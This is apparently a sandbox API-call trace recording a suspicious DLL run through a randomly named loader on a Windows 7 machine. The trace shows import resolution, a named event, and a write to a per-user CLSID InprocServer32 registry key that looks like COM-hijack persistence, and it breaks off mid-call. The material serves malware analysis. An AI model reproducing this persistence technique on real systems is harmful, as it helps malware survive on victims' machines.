[0031.373] GetProcAddress (hModule=0x77510000, lpProcName="inet_ntoa") returned 0x7751b131 [0031.373] GetProcAddress (hModule=0x761d0000, lpProcName="CreateFileA") returned 0x7621cee8 [0031.373] GetProcAddress (hModule=0x761d0000, lpProcName="WriteFile") returned 0x76221400 [0031.373] GetProcAddress (hModule=0x761d0000, lpProcName="CloseHandle") returned 0x7621ca7c [0031.374] GetProcAddress (hModule=0x761d0000, lpProcName="FindFirstFileA") returned 0x76222d89 [0031.374] GetProcAddress (hModule=0x761d0000, lpProcName="FindNextFileA") returned 0x7621a187 [0031.374] GetProcAddress (hModule=0x761d0000, lpProcName="FindClose") returned 0x76220e62 [0031.374] GetProcAddress (hModule=0x761d0000, lpProcName="DeleteFileA") returned 0x762147cb [0031.374] GetProcAddress (hModule=0x761d0000, lpProcName="FileTimeToSystemTime") returned 0x76221dfe [0031.374] GetProcAddress (hModule=0x761d0000, lpProcName="SetFilePointer") returned 0x7621db36 [0031.374] GetProcAddress (hModule=0x761d0000, lpProcName="CreateProcessA") returned 0x761d2082 [0031.374] GetProcAddress (hModule=0x761d0000, lpProcName="WaitForSingleObject") returned 0x7621ba90 [0031.374] GetProcAddress (hModule=0x761d0000, lpProcName="ReadFile") returned 0x762196fb [0031.374] GetProcAddress (hModule=0x761d0000, lpProcName="CreateEventW") returned 0x76223386 [0031.374] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemDirectoryA") returned 0x76218fc5 [0031.374] GetProcAddress (hModule=0x761d0000, lpProcName="GetWindowsDirectoryW") returned 0x762104b6 [0031.374] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathA") returned 0x76236a65 [0031.374] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathW") returned 0x76208b33 [0031.374] GetProcAddress (hModule=0x761d0000, lpProcName="GetLocalTime") returned 0x7621a90e [0031.375] GetProcAddress (hModule=0x761d0000, lpProcName="GetComputerNameW") returned 0x762103ff [0031.375] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemInfo") returned 0x76223728 [0031.375] GetProcAddress (hModule=0x761d0000, lpProcName="GetVersionExW") returned 0x76213b1a [0031.375] GetProcAddress (hModule=0x761d0000, lpProcName="GetEnvironmentVariableA") returned 0x7621ce2e [0031.375] GetProcAddress (hModule=0x761d0000, lpProcName="CopyFileA") returned 0x7623532c [0031.375] GetProcAddress (hModule=0x761d0000, lpProcName="GetLastError") returned 0x7621bf00 [0031.375] GetProcAddress (hModule=0x761d0000, lpProcName="SetFileAttributesA") returned 0x76208cb9 [0031.375] GetProcAddress (hModule=0x761d0000, lpProcName="GetFileSize") returned 0x76210273 [0031.375] GetProcAddress (hModule=0x761d0000, lpProcName="CreateDirectoryA") returned 0x762368da [0031.375] GetProcAddress (hModule=0x761d0000, lpProcName="TerminateProcess") returned 0x76212331 [0031.375] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryW") returned 0x76223c01 [0031.375] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0031.375] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryA") returned 0x7622395c [0031.375] GetProcAddress (hModule=0x761d0000, lpProcName="MultiByteToWideChar") returned 0x7622452b [0031.376] GetProcAddress (hModule=0x76700000, lpProcName="RegCreateKeyExA") returned 0x76711469 [0031.376] GetProcAddress (hModule=0x76700000, lpProcName="RegEnumValueA") returned 0x7670cf49 [0031.376] GetProcAddress (hModule=0x76700000, lpProcName="RegDeleteValueA") returned 0x7672a4ea [0031.376] GetProcAddress (hModule=0x76700000, lpProcName="RegCloseKey") returned 0x7671469d [0031.376] GetProcAddress (hModule=0x77720000, lpProcName="memset") returned 0x77729790 [0031.376] GetProcAddress (hModule=0x77720000, lpProcName="memcpy") returned 0x77729910 [0031.376] GetProcAddress (hModule=0x77720000, lpProcName="memcmp") returned 0x77737975 [0031.376] GetProcAddress (hModule=0x77720000, lpProcName="malloc") returned 0x77729cee [0031.376] GetProcAddress (hModule=0x77720000, lpProcName="free") returned 0x77729894 [0031.376] GetProcAddress (hModule=0x77720000, lpProcName="strchr") returned 0x7772dbeb [0031.376] GetProcAddress (hModule=0x77720000, lpProcName="strncpy") returned 0x777308a9 [0031.376] GetProcAddress (hModule=0x77720000, lpProcName="atoi") returned 0x7772dbe0 [0031.376] GetProcAddress (hModule=0x77720000, lpProcName="_snwprintf") returned 0x777495d1 [0031.376] GetProcAddress (hModule=0x77720000, lpProcName="strncat") returned 0x77750909 [0031.376] GetProcAddress (hModule=0x77720000, lpProcName="strstr") returned 0x7772de4a [0031.377] GetProcAddress (hModule=0x77720000, lpProcName="strlen") returned 0x777343d3 [0031.377] GetProcAddress (hModule=0x77720000, lpProcName="strrchr") returned 0x7772dbae [0031.377] GetProcAddress (hModule=0x77720000, lpProcName="_snprintf") returned 0x7774fa7c [0031.377] GetProcAddress (hModule=0x77ad0000, lpProcName="OemToCharA") returned 0x77b2f041 [0031.377] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfA") returned 0x77ae3f47 [0031.377] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfW") returned 0x77af426d [0031.377] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0031.377] GetModuleFileNameW (in: hModule=0x72ee0000, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0031.377] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0031.377] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="97ryuhf023") returned 0x74 [0031.377] GetVersionExW (in: lpVersionInformation=0x24f694*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x24f694*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0031.377] GetLastError () returned 0x7f [0031.377] SetLastError (dwErrCode=0x7f) [0031.377] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Classes\\CLSID\\\\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\\InprocServer32", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x24f388, lpdwDisposition=0x0 | out: phkResult=0x24f388*=0x7c, lpdwDisposition=0x0) returned 0x0 Thread: id = 150 os_tid = 0xde4 [0036.552] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.552] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0036.552] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.552] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0036.552] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0036.552] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0036.552] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0036.552] GetCurrentThreadId () returned 0xde4 Process: id = "10" image_name = "gorctexxzx.exe" filename = "c:\\windows\\system32\\gorctexxzx.exe" page_root = "0x7ef4f7a0" os_pid = "0xac8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa3c" cmd_line = "\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=AddAtomS /fn_args=\"0\"" cur_dir = "C:\\Windows\\system32\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0e7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 566 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 567 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 568 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 569 start_va = 0x210000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 570 start_va = 0x11d0000 end_va = 0x11f0fff entry_point = 0x11d0000 region_type = mapped_file name = "gorctexxzx.exe" filename = "\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe") Region: id = 571 start_va = 0x77e80000 end_va = 0x77e80fff entry_point = 0x77e80000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 572 start_va = 0x77ec0000 end_va = 0x77ffbfff entry_point = 0x77ec0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 573 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 574 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 575 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 576 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 577 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 578 start_va = 0x3f0000 end_va = 0x4effff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 579 start_va = 0x6c0000 end_va = 0x6cffff entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 580 start_va = 0x75f70000 end_va = 0x75fb9fff entry_point = 0x75f70000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 581 start_va = 0x761d0000 end_va = 0x762a3fff entry_point = 0x761d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 582 start_va = 0x76300000 end_va = 0x76356fff entry_point = 0x76300000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 583 start_va = 0x765f0000 end_va = 0x765f9fff entry_point = 0x765f0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 584 start_va = 0x767a0000 end_va = 0x773e9fff entry_point = 0x767a0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 585 start_va = 0x773f0000 end_va = 0x7748cfff entry_point = 0x773f0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 586 start_va = 0x77550000 end_va = 0x775f0fff entry_point = 0x77550000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 587 start_va = 0x77720000 end_va = 0x777cbfff entry_point = 0x77720000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 588 start_va = 0x77970000 end_va = 0x77acbfff entry_point = 0x77970000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 589 start_va = 0x77ad0000 end_va = 0x77b98fff entry_point = 0x77ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 590 start_va = 0x77c80000 end_va = 0x77ccdfff entry_point = 0x77c80000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 591 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 592 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 593 start_va = 0x762b0000 end_va = 0x762cefff entry_point = 0x762b0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 594 start_va = 0x77ba0000 end_va = 0x77c6bfff entry_point = 0x77ba0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 595 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 596 start_va = 0x190000 end_va = 0x190fff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 597 start_va = 0x4f0000 end_va = 0x5f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" filename = "" Region: id = 598 start_va = 0x1200000 end_va = 0x1dfffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001200000" filename = "" Region: id = 599 start_va = 0x72db0000 end_va = 0x72db2fff entry_point = 0x72db0000 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 600 start_va = 0x72ee0000 end_va = 0x72f24fff entry_point = 0x72ee0000 region_type = mapped_file name = "97328f~1.dll" filename = "\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll") Region: id = 601 start_va = 0x762e0000 end_va = 0x762f8fff entry_point = 0x762e0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 602 start_va = 0x76700000 end_va = 0x7679ffff entry_point = 0x76700000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 603 start_va = 0x6d0000 end_va = 0x86ffff entry_point = 0x0 region_type = private name = "private_0x00000000006d0000" filename = "" Region: id = 604 start_va = 0x77510000 end_va = 0x77544fff entry_point = 0x77510000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 605 start_va = 0x762d0000 end_va = 0x762d5fff entry_point = 0x762d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 606 start_va = 0x310000 end_va = 0x3affff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Thread: id = 26 os_tid = 0xacc [0031.417] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x30f434 | out: lpSystemTimeAsFileTime=0x30f434*(dwLowDateTime=0xe071bdd0, dwHighDateTime=0x1d3dfba)) [0031.417] GetCurrentProcessId () returned 0xac8 [0031.417] GetCurrentThreadId () returned 0xacc [0031.417] GetTickCount () returned 0x1703f [0031.417] QueryPerformanceCounter (in: lpPerformanceCount=0x30f42c | out: lpPerformanceCount=0x30f42c*=360224953) returned 1 [0031.426] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.426] GetProcAddress (hModule=0x761d0000, lpProcName="FlsAlloc") returned 0x7622418d [0031.426] GetProcAddress (hModule=0x761d0000, lpProcName="FlsGetValue") returned 0x76221e16 [0031.426] GetProcAddress (hModule=0x761d0000, lpProcName="FlsSetValue") returned 0x762276e6 [0031.426] GetProcAddress (hModule=0x761d0000, lpProcName="FlsFree") returned 0x76221f61 [0031.426] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.426] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0031.426] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.426] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0031.426] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.427] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0031.427] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.427] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0031.427] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.427] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0031.427] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.427] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0031.427] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.427] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0031.428] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.428] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0031.428] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.428] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0031.428] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0031.428] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0031.428] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0031.429] GetCurrentThreadId () returned 0xacc [0031.429] GetCommandLineA () returned="\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=AddAtomS /fn_args=\"0\"" [0031.429] GetEnvironmentStringsW () returned 0x4078b8* [0031.429] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 992 [0031.429] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=992, lpMultiByteStr=0x8609f0, cbMultiByte=992, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 992 [0031.429] FreeEnvironmentStringsW (penv=0x4078b8) returned 1 [0031.429] GetStartupInfoA (in: lpStartupInfo=0x30f384 | out: lpStartupInfo=0x30f384*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\goRcteXxZX.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0031.429] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0031.429] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0031.429] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0031.429] SetHandleCount (uNumber=0x20) returned 0x20 [0031.429] GetLastError () returned 0x0 [0031.429] SetLastError (dwErrCode=0x0) [0031.429] GetLastError () returned 0x0 [0031.429] SetLastError (dwErrCode=0x0) [0031.430] GetLastError () returned 0x0 [0031.430] SetLastError (dwErrCode=0x0) [0031.430] GetACP () returned 0x4e4 [0031.430] GetLastError () returned 0x0 [0031.430] SetLastError (dwErrCode=0x0) [0031.430] IsValidCodePage (CodePage=0x4e4) returned 1 [0031.430] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x30f364 | out: lpCPInfo=0x30f364) returned 1 [0031.430] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x30ee30 | out: lpCPInfo=0x30ee30) returned 1 [0031.430] GetLastError () returned 0x0 [0031.430] SetLastError (dwErrCode=0x0) [0031.430] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x30edc0 | out: lpCharType=0x30edc0) returned 1 [0031.430] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x30f244, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0031.430] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x30f244, cbMultiByte=256, lpWideCharStr=0x30eba8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0031.430] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x30ee44 | out: lpCharType=0x30ee44) returned 1 [0031.430] GetLastError () returned 0x0 [0031.430] SetLastError (dwErrCode=0x0) [0031.430] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0031.430] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x30f244, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0031.430] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x30f244, cbMultiByte=256, lpWideCharStr=0x30eb78, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ鸕矲狰Ā") returned 256 [0031.430] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ鸕矲狰Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0031.430] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ鸕矲狰Ā", cchSrc=256, lpDestStr=0x30e968, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0031.430] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x30f144, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" 